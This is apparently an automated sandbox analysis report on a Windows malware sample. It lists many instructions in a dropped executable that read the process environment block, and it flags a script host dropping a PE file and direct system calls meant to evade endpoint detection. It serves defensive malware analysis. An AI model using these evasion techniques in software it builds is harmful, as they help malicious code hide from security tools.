Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355B5152 mov eax, dword ptr fs:[00000030h]	5_2_355B5152
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35574144 mov eax, dword ptr fs:[00000030h]	5_2_35574144
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35574144 mov eax, dword ptr fs:[00000030h]	5_2_35574144
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35574144 mov ecx, dword ptr fs:[00000030h]	5_2_35574144
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35574144 mov eax, dword ptr fs:[00000030h]	5_2_35574144
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35574144 mov eax, dword ptr fs:[00000030h]	5_2_35574144
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E6154 mov eax, dword ptr fs:[00000030h]	5_2_354E6154
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E6154 mov eax, dword ptr fs:[00000030h]	5_2_354E6154
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DC156 mov eax, dword ptr fs:[00000030h]	5_2_354DC156
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E7152 mov eax, dword ptr fs:[00000030h]	5_2_354E7152
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35579179 mov eax, dword ptr fs:[00000030h]	5_2_35579179
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DF172 mov eax, dword ptr fs:[00000030h]	5_2_354DF172
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DF172 mov eax, dword ptr fs:[00000030h]	5_2_354DF172
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DF172 mov eax, dword ptr fs:[00000030h]	5_2_354DF172
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DF172 mov eax, dword ptr fs:[00000030h]	5_2_354DF172
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DF172 mov eax, dword ptr fs:[00000030h]	5_2_354DF172
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DF172 mov eax, dword ptr fs:[00000030h]	5_2_354DF172
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DF172 mov eax, dword ptr fs:[00000030h]	5_2_354DF172
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DF172 mov eax, dword ptr fs:[00000030h]	5_2_354DF172
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DF172 mov eax, dword ptr fs:[00000030h]	5_2_354DF172
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DF172 mov eax, dword ptr fs:[00000030h]	5_2_354DF172
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DF172 mov eax, dword ptr fs:[00000030h]	5_2_354DF172
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DF172 mov eax, dword ptr fs:[00000030h]	5_2_354DF172
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DF172 mov eax, dword ptr fs:[00000030h]	5_2_354DF172
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DF172 mov eax, dword ptr fs:[00000030h]	5_2_354DF172
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DF172 mov eax, dword ptr fs:[00000030h]	5_2_354DF172
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DF172 mov eax, dword ptr fs:[00000030h]	5_2_354DF172
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DF172 mov eax, dword ptr fs:[00000030h]	5_2_354DF172
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DF172 mov eax, dword ptr fs:[00000030h]	5_2_354DF172
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DF172 mov eax, dword ptr fs:[00000030h]	5_2_354DF172
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DF172 mov eax, dword ptr fs:[00000030h]	5_2_354DF172
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DF172 mov eax, dword ptr fs:[00000030h]	5_2_354DF172
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3558A118 mov ecx, dword ptr fs:[00000030h]	5_2_3558A118
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3558A118 mov eax, dword ptr fs:[00000030h]	5_2_3558A118
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3558A118 mov eax, dword ptr fs:[00000030h]	5_2_3558A118
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3558A118 mov eax, dword ptr fs:[00000030h]	5_2_3558A118
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355A0115 mov eax, dword ptr fs:[00000030h]	5_2_355A0115
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35510124 mov eax, dword ptr fs:[00000030h]	5_2_35510124
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DB136 mov eax, dword ptr fs:[00000030h]	5_2_354DB136
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DB136 mov eax, dword ptr fs:[00000030h]	5_2_354DB136
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DB136 mov eax, dword ptr fs:[00000030h]	5_2_354DB136
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DB136 mov eax, dword ptr fs:[00000030h]	5_2_354DB136
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E1131 mov eax, dword ptr fs:[00000030h]	5_2_354E1131
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E1131 mov eax, dword ptr fs:[00000030h]	5_2_354E1131
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551D1D0 mov eax, dword ptr fs:[00000030h]	5_2_3551D1D0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551D1D0 mov ecx, dword ptr fs:[00000030h]	5_2_3551D1D0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3555E1D0 mov eax, dword ptr fs:[00000030h]	5_2_3555E1D0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3555E1D0 mov eax, dword ptr fs:[00000030h]	5_2_3555E1D0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3555E1D0 mov ecx, dword ptr fs:[00000030h]	5_2_3555E1D0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3555E1D0 mov eax, dword ptr fs:[00000030h]	5_2_3555E1D0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3555E1D0 mov eax, dword ptr fs:[00000030h]	5_2_3555E1D0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355B51CB mov eax, dword ptr fs:[00000030h]	5_2_355B51CB
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355A61C3 mov eax, dword ptr fs:[00000030h]	5_2_355A61C3
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355A61C3 mov eax, dword ptr fs:[00000030h]	5_2_355A61C3
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E51ED mov eax, dword ptr fs:[00000030h]	5_2_354E51ED
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355101F8 mov eax, dword ptr fs:[00000030h]	5_2_355101F8
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355B61E5 mov eax, dword ptr fs:[00000030h]	5_2_355B61E5
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355051EF mov eax, dword ptr fs:[00000030h]	5_2_355051EF
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355051EF mov eax, dword ptr fs:[00000030h]	5_2_355051EF
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355051EF mov eax, dword ptr fs:[00000030h]	5_2_355051EF
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355051EF mov eax, dword ptr fs:[00000030h]	5_2_355051EF
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355051EF mov eax, dword ptr fs:[00000030h]	5_2_355051EF
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355051EF mov eax, dword ptr fs:[00000030h]	5_2_355051EF
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355051EF mov eax, dword ptr fs:[00000030h]	5_2_355051EF
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355051EF mov eax, dword ptr fs:[00000030h]	5_2_355051EF
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355051EF mov eax, dword ptr fs:[00000030h]	5_2_355051EF
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355051EF mov eax, dword ptr fs:[00000030h]	5_2_355051EF
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355051EF mov eax, dword ptr fs:[00000030h]	5_2_355051EF
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355051EF mov eax, dword ptr fs:[00000030h]	5_2_355051EF
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355051EF mov eax, dword ptr fs:[00000030h]	5_2_355051EF
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35537190 mov eax, dword ptr fs:[00000030h]	5_2_35537190
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3556019F mov eax, dword ptr fs:[00000030h]	5_2_3556019F
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3556019F mov eax, dword ptr fs:[00000030h]	5_2_3556019F
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3556019F mov eax, dword ptr fs:[00000030h]	5_2_3556019F
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3556019F mov eax, dword ptr fs:[00000030h]	5_2_3556019F
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3559C188 mov eax, dword ptr fs:[00000030h]	5_2_3559C188
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3559C188 mov eax, dword ptr fs:[00000030h]	5_2_3559C188
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35520185 mov eax, dword ptr fs:[00000030h]	5_2_35520185
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DA197 mov eax, dword ptr fs:[00000030h]	5_2_354DA197
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DA197 mov eax, dword ptr fs:[00000030h]	5_2_354DA197
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DA197 mov eax, dword ptr fs:[00000030h]	5_2_354DA197
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355911A4 mov eax, dword ptr fs:[00000030h]	5_2_355911A4
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355911A4 mov eax, dword ptr fs:[00000030h]	5_2_355911A4
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355911A4 mov eax, dword ptr fs:[00000030h]	5_2_355911A4
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355911A4 mov eax, dword ptr fs:[00000030h]	5_2_355911A4
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354FB1B0 mov eax, dword ptr fs:[00000030h]	5_2_354FB1B0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550B052 mov eax, dword ptr fs:[00000030h]	5_2_3550B052
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3558705E mov ebx, dword ptr fs:[00000030h]	5_2_3558705E
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3558705E mov eax, dword ptr fs:[00000030h]	5_2_3558705E
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E2050 mov eax, dword ptr fs:[00000030h]	5_2_354E2050
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550C073 mov eax, dword ptr fs:[00000030h]	5_2_3550C073
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3555D070 mov ecx, dword ptr fs:[00000030h]	5_2_3555D070
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355B5060 mov eax, dword ptr fs:[00000030h]	5_2_355B5060
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F1070 mov eax, dword ptr fs:[00000030h]	5_2_354F1070
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F1070 mov ecx, dword ptr fs:[00000030h]	5_2_354F1070
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F1070 mov eax, dword ptr fs:[00000030h]	5_2_354F1070
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F1070 mov eax, dword ptr fs:[00000030h]	5_2_354F1070
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F1070 mov eax, dword ptr fs:[00000030h]	5_2_354F1070
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F1070 mov eax, dword ptr fs:[00000030h]	5_2_354F1070
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F1070 mov eax, dword ptr fs:[00000030h]	5_2_354F1070
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F1070 mov eax, dword ptr fs:[00000030h]	5_2_354F1070
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F1070 mov eax, dword ptr fs:[00000030h]	5_2_354F1070
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F1070 mov eax, dword ptr fs:[00000030h]	5_2_354F1070
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F1070 mov eax, dword ptr fs:[00000030h]	5_2_354F1070
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F1070 mov eax, dword ptr fs:[00000030h]	5_2_354F1070
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F1070 mov eax, dword ptr fs:[00000030h]	5_2_354F1070
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354FE016 mov eax, dword ptr fs:[00000030h]	5_2_354FE016
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354FE016 mov eax, dword ptr fs:[00000030h]	5_2_354FE016
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354FE016 mov eax, dword ptr fs:[00000030h]	5_2_354FE016
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354FE016 mov eax, dword ptr fs:[00000030h]	5_2_354FE016
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355A903E mov eax, dword ptr fs:[00000030h]	5_2_355A903E
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355A903E mov eax, dword ptr fs:[00000030h]	5_2_355A903E
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355A903E mov eax, dword ptr fs:[00000030h]	5_2_355A903E
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355A903E mov eax, dword ptr fs:[00000030h]	5_2_355A903E
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DA020 mov eax, dword ptr fs:[00000030h]	5_2_354DA020
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DC020 mov eax, dword ptr fs:[00000030h]	5_2_354DC020
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355B50D9 mov eax, dword ptr fs:[00000030h]	5_2_355B50D9
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355620DE mov eax, dword ptr fs:[00000030h]	5_2_355620DE
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355090DB mov eax, dword ptr fs:[00000030h]	5_2_355090DB
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F70C0 mov eax, dword ptr fs:[00000030h]	5_2_354F70C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F70C0 mov ecx, dword ptr fs:[00000030h]	5_2_354F70C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F70C0 mov ecx, dword ptr fs:[00000030h]	5_2_354F70C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F70C0 mov eax, dword ptr fs:[00000030h]	5_2_354F70C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F70C0 mov ecx, dword ptr fs:[00000030h]	5_2_354F70C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F70C0 mov ecx, dword ptr fs:[00000030h]	5_2_354F70C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F70C0 mov eax, dword ptr fs:[00000030h]	5_2_354F70C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F70C0 mov eax, dword ptr fs:[00000030h]	5_2_354F70C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F70C0 mov eax, dword ptr fs:[00000030h]	5_2_354F70C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F70C0 mov eax, dword ptr fs:[00000030h]	5_2_354F70C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F70C0 mov eax, dword ptr fs:[00000030h]	5_2_354F70C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F70C0 mov eax, dword ptr fs:[00000030h]	5_2_354F70C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F70C0 mov eax, dword ptr fs:[00000030h]	5_2_354F70C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F70C0 mov eax, dword ptr fs:[00000030h]	5_2_354F70C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F70C0 mov eax, dword ptr fs:[00000030h]	5_2_354F70C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F70C0 mov eax, dword ptr fs:[00000030h]	5_2_354F70C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F70C0 mov eax, dword ptr fs:[00000030h]	5_2_354F70C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354F70C0 mov eax, dword ptr fs:[00000030h]	5_2_354F70C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3555D0C0 mov eax, dword ptr fs:[00000030h]	5_2_3555D0C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3555D0C0 mov eax, dword ptr fs:[00000030h]	5_2_3555D0C0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355220F0 mov ecx, dword ptr fs:[00000030h]	5_2_355220F0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E80E9 mov eax, dword ptr fs:[00000030h]	5_2_354E80E9
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DA0E3 mov ecx, dword ptr fs:[00000030h]	5_2_354DA0E3
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355050E4 mov eax, dword ptr fs:[00000030h]	5_2_355050E4
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355050E4 mov ecx, dword ptr fs:[00000030h]	5_2_355050E4
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DC0F0 mov eax, dword ptr fs:[00000030h]	5_2_354DC0F0
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DD08D mov eax, dword ptr fs:[00000030h]	5_2_354DD08D
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550D090 mov eax, dword ptr fs:[00000030h]	5_2_3550D090
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3550D090 mov eax, dword ptr fs:[00000030h]	5_2_3550D090
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E208A mov eax, dword ptr fs:[00000030h]	5_2_354E208A
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3551909C mov eax, dword ptr fs:[00000030h]	5_2_3551909C
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354E5096 mov eax, dword ptr fs:[00000030h]	5_2_354E5096
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355A60B8 mov eax, dword ptr fs:[00000030h]	5_2_355A60B8
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355A60B8 mov ecx, dword ptr fs:[00000030h]	5_2_355A60B8
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DD34C mov eax, dword ptr fs:[00000030h]	5_2_354DD34C
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354DD34C mov eax, dword ptr fs:[00000030h]	5_2_354DD34C
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355AA352 mov eax, dword ptr fs:[00000030h]	5_2_355AA352
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3556035C mov eax, dword ptr fs:[00000030h]	5_2_3556035C
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3556035C mov eax, dword ptr fs:[00000030h]	5_2_3556035C
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3556035C mov eax, dword ptr fs:[00000030h]	5_2_3556035C
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3556035C mov ecx, dword ptr fs:[00000030h]	5_2_3556035C
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3556035C mov eax, dword ptr fs:[00000030h]	5_2_3556035C
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_3556035C mov eax, dword ptr fs:[00000030h]	5_2_3556035C
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_355B5341 mov eax, dword ptr fs:[00000030h]	5_2_355B5341
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354D9353 mov eax, dword ptr fs:[00000030h]	5_2_354D9353
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_354D9353 mov eax, dword ptr fs:[00000030h]	5_2_354D9353
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35562349 mov eax, dword ptr fs:[00000030h]	5_2_35562349
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35562349 mov eax, dword ptr fs:[00000030h]	5_2_35562349
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35562349 mov eax, dword ptr fs:[00000030h]	5_2_35562349
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35562349 mov eax, dword ptr fs:[00000030h]	5_2_35562349
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35562349 mov eax, dword ptr fs:[00000030h]	5_2_35562349
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35562349 mov eax, dword ptr fs:[00000030h]	5_2_35562349
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35562349 mov eax, dword ptr fs:[00000030h]	5_2_35562349
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35562349 mov eax, dword ptr fs:[00000030h]	5_2_35562349
Source: C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe	Code function: 5_2_35562349 mov eax, dword ptr fs:[00000030h]	5_2_35562349

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: temp_file_rhjRS.exe.0.dr

Jump to dropped file

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe	NtQueryValueKey: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\uYqHlAjHpEBKEvbYuglGyEcZgTbbzQHKToBlHOXmLJM\IKcKppyYrG.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
